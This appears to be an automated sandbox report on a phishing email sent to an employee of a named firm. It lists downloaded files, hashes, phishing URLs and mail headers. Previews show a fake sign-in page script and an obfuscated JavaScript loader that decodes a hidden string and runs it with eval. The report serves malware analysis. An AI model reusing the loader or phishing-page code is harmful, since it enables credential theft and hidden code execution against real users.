                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-bold.woff
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (52007), with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):150230
                                                                        Entropy (8bit):5.8345144657424175
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F551056D88DBA8D899153B878C953551
                                                                        SHA1:2C313208E6A1B3367E93724214176D9123A8D1D2
                                                                        SHA-256:E88C99B62B9ADEE0A7EAA0C2A2E4A6303B644B5E27398FDF99ED69D79593B679
                                                                        SHA-512:77C5991415D9C655C7CF8CBF93CB897A4E786C91CDAE7E7CA84B4A737AA66FB19A02E70F5A86890999BD3995ECD7C55CC82C7C107E48FB1E439A754895156598
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW
                                                                        Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:0
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):2061
                                                                        Entropy (8bit):4.68013947979367
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2C77B57688ED3408E3C8FE1F2BA204B7
                                                                        SHA1:D95EB88E5DAB3B3F55B3096E0FFDF415F9CBF108
                                                                        SHA-256:2E9529DFF72CA848F13B842FCFAEC9388BA170C9C3EC14A1CDF2F01CF55F3942
                                                                        SHA-512:FF6A1B622FE717DC87676E0173BA9D799A87A6CC5922AEDCD8E64C2D007972F02A909377B960B1E160B032BD30A7FAED215784795BA56521281E607224598447
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://y13tzxbjz1.moydow.de/DzC0pn01Csl0xBhEB8ZuBtzVkjUWPyAfYsoLARTnALcLCFnUCNW3DjobhQoJgtJFVwG9u3yxgKVJMxgGbRx2il5WBIbQaIcwT3MQa1jsOGLaAtedE1h9IThKR1LyVBhvwGIHHPsd60cpE2A5rtuhv6I2WjwtnliaqoT9XvtUNVLGJLs5tZQLcBfyptubL9vuVj1dixwg/dOGmOwe0jJcVHNyok9MfrN8x9KudV9hVKZoxRp1y2BOwFcLtHoWhYg7sREANrsfv3A5AfpiuKKaytzguSjLIsQ5RSezJDRkc6zjndnbLTWsxuI8keuUDUfnjzGiSaqgraw5zZ8KKB2TN4ykt2uTP8cCO2lsCahG3cVrtiyW29K12PSaLO0lWjUIFTWblxnTfKoo78ZNc/richard.thorn@quiltercheviot.com
                                                                        Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Sign in</title>.. <script>.. // Function to generate random alphanumeric characters.. function generateRandomString(length) {.. const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';.. let result = '';.. for (let i = 0; i < length; i++) {.. result += characters.charAt(Math.floor(Math.random() * characters.length));.. }.. return result;.. }.... // Function to extract subdomain from email (between @ and .).. function extractSubdomain(email) {.. // Check if it's an email format.. if (email.includes('@') && email.includes('.')) {.. // Extract the part between @ and ... const atIndex = email.indexOf('@');.. const dotIndex = email.inde
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:dropped
                                                                        Size (bytes):1864
                                                                        Entropy (8bit):5.222032823730197
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65447)
                                                                        Category:downloaded
                                                                        Size (bytes):89501
                                                                        Entropy (8bit):5.289893677458563
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):35786
                                                                        Entropy (8bit):5.058073854893359
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                        SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                        SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                        SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/xyrN6azxUjCRpqSzcd26
                                                                        Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):937
                                                                        Entropy (8bit):7.737931820487441
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FC3B7BBE7970F47579127561139060E2
                                                                        SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                        SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                        SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://developers.cloudflare.com/favicon.png
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                        Category:downloaded
                                                                        Size (bytes):28000
                                                                        Entropy (8bit):7.99335735457429
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                        SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                        SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                        SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/GDSherpa-bold.woff2
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:downloaded
                                                                        Size (bytes):644
                                                                        Entropy (8bit):4.6279651077789685
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:541B83C2195088043337E4353B6FD60D
                                                                        SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                        SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                        SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/wxEAvfh79xY931O7OkQQ5DeTPrst9wZU0uuvZgKtV34130
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):4712061
                                                                        Entropy (8bit):2.583772531747173
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E34A613844E71AD9EA25A2FAAB768F3F
                                                                        SHA1:34844596642BED7752C4AED44721CEE52593B344
                                                                        SHA-256:D767A16A68A568D204E0E4283BDDB8A9702CCF95BF2715D512C4AE39C3D79AB5
                                                                        SHA-512:8D5342EC77557793F73701400220B10421E6B1ED941876554D27F27A0573644F26C66FA4AB7019E666F6471688E2F7857394CC127197EF109FC076BC5534342C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/34ffrvM4h24NzkkyD6SwzVMu9WijuexAcp9VzMOlBVr67107
                                                                        Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (48238)
                                                                        Category:downloaded
                                                                        Size (bytes):48239
                                                                        Entropy (8bit):5.343270713163753
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:184E29DE57C67BC329C650F294847C16
                                                                        SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                                        SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                                        SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                                        Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:downloaded
                                                                        Size (bytes):7390
                                                                        Entropy (8bit):4.02755241095864
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                        SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                        SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                        SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://quiltercheviot.uuvght.ru/ij4ju2f5snoNTxMCJrxIedZBHZMU2Iz4yXZa0cdKQl2fDm9jTZe4c7rlVqysESBB56169
                                                                        Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (51734)
                                                                        Category:downloaded
                                                                        Size (bytes):222931
                                                                        Entropy (8bit):5.0213311632628725
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                        SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                        SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                        SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                        File type:ASCII text, with CRLF line terminators
                                                                        Entropy (8bit):6.069167577922534
                                                                        TrID:
                                                                          File name:message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml
                                                                          File size:12'202 bytes
                                                                          MD5:11e0e238d10996702dcef9893e69bfba
                                                                          SHA1:2be67d6f4f21992b9dcc642154d174596a2f87b1
                                                                          SHA256:66101f19ed9097e71c47e841316729e51b48442dd77dbc9e75a2e38e48fdd60b
                                                                          SHA512:4f193f0e33a6f03c74b7f77db38d72f71462a9b175a6939bda5b78fd600393b0dcedc6ffe88dba6ec379cc9c0016677b541a30823cba0c9007a74d50fc8a325d
                                                                          SSDEEP:192:+mMTizlQbVTgqGSpzShb2ftmKSLgwx/zb2HPQXs24iAc4Sy7mCAL8ZT5NrnJ2fUQ:WGqzShMtIgwxOHPQ8diocCVH2fUgmS
                                                                          TLSH:76426B1E39D6B86CA7F42289F47A3E8FA3841711D56360887C3056B9499E3BDD9E84F0
                                                                          Subject:[External] Attached/image from ADMIN@quiltercheviot.com
                                                                          From:ePrinter 0403873580 <info@servis.ai>
                                                                          To:richard.thorn@quiltercheviot.com
                                                                          Cc:
                                                                          BCC:
                                                                          Date:Tue, 18 Mar 2025 01:17:55 +0000
                                                                          Communications:
                                                                            Attachments:
                                                                            • 9114950926.svg
                                                                            Key Value
                                                                            Authentication-Results:ppops.net; dkim=pass header.s=s1 header.d=servis.ai; spf=pass smtp.mailfrom=bounces+25952314-b56d-richard.thorn=quiltercheviot.com@em9655.servis.ai; dmarc=pass header.from=servis.ai
                                                                            Received:from [100.64.100.6] (unknown) by geopod-ismtpd-30 (SG) with ESMTP id 0XSkcQEiS5ehXOfhSk9JKw for <richard.thorn@quiltercheviot.com>; Tue, 18 Mar 2025 01:17:55.159 +0000 (UTC)
                                                                            DKIM-Signature:v=1; a=rsa-sha256; c=relaxed/relaxed; d=servis.ai; h=content-type:mime-version:from:subject:to:cc:content-type:from: subject:to; s=s1; bh=e2niyGSMDjBpvUHCq0Y07ovROEHl4ynv9uqxpZEo8jQ=; b=fwrI39d9jY8yaRmgieabU3i58TxTz0O8DJ0s5y4xiQ6b33yRNqbWG71X42NYOk/WiutP tPLeXUE/pnAWVvjgg6D8mewx/pNsMPinwFYFgRNc3zPVUat5yOCKHze2zSOJ0YAmdhjl7f 1PzFCN9mQ/sMNnAKIyODK2dLm5OINZn6EV5FTaotyYrO++8AnmE9gZwnAn6sU9lfMTP5s1 YdoKG0rgAe2fCV4hlAOIhmmaLhkphULY+tZAFl3t3V2tbkuRT++JnWX+K+eAH28+p5FPML LKVFFpbcCskzAvBgL7izw2Xn6JV1AnqOYLpRGG3UCJtDz9/yT72wNBdTaFkPnJFg==
                                                                            Content-Type:multipart/mixed; boundary="===============0344819296694936674=="
                                                                            MIME-Version:1.0
                                                                            From:ePrinter 0403873580 <info@servis.ai>
                                                                            Message-ID:<0XSkcQEiS5ehXOfhSk9JKw@geopod-ismtpd-30>
                                                                            Date:Tue, 18 Mar 2025 01:17:55 +0000
                                                                            To:richard.thorn@quiltercheviot.com
                                                                            X-Entity-ID:u001.MWkVaOzEy9/UiB0VNzJpzQ==
                                                                            X-Authority-Analysis:v=2.4 cv=BenY0qt2 c=1 sm=1 tr=0 ts=67d8ca6c b=1 cx=c_pps a=oDp3HqeTnKU/eXVa18u/4A==:117 a=oDp3HqeTnKU/eXVa18u/4A==:17 a=JZZLUqjyAAAA:8 a=JO_3FCIQRjkA:10 a=Vs1iUdzkB0EA:10 a=FnRh6jz0t2IA:10 a=CjuIK1q_8ugA:10 a=SSmOFEACAAAA:8 a=cWW1OmiiEieVMJtmam8A:9 a=L03L2QfmqWoA:10 a=1WNtSb5ECZgA:10 a=QEXdDO2ut3YA:10 a=tDTIrp_YVeGTO7gPfFWI:22 a=fNnvNnx3n4v3WcUcLETx:22
                                                                            X-Proofpoint-GUID:SBwd1OMxcjFk7ozudltmOuwUCLXGZuE4
                                                                            X-Proofpoint-ORIG-GUID:-EWbeFah4PiU39jfmNlU0j1tYKVOy0of
                                                                            X-CLX-Shades:Junk
                                                                            Subject:[External] Attached/image from ADMIN@quiltercheviot.com
                                                                            X-Proofpoint-Virus-Version:vendor=baseguard engine=ICAP:2.0.293,Aquarius:18.0.1093,Hydra:6.0.680,FMLib:17.12.68.34 definitions=2025-03-17_10,2025-03-17_03,2024-11-22_01
                                                                            X-Proofpoint-Spam-Details:rule=inbound_phish policy=inbound score=100 lowpriorityscore=0 adultscore=0 spamscore=0 unknownsenderscore=20 clxscore=-771 malwarescore=0 bulkscore=0 snscore=2 phishscore=100 mlxscore=0 suspectscore=0 impostorscore=0 priorityscore=1501 classifier=phish authscore=0 authtc=n/a authcc= route=inbound adjust=0 reason=mlx scancount=2 engine=8.19.0-2502280000 definitions=main-2503180007 domainage_hfrom=643

                                                                            Icon Hash:46070c0a8e0c67d6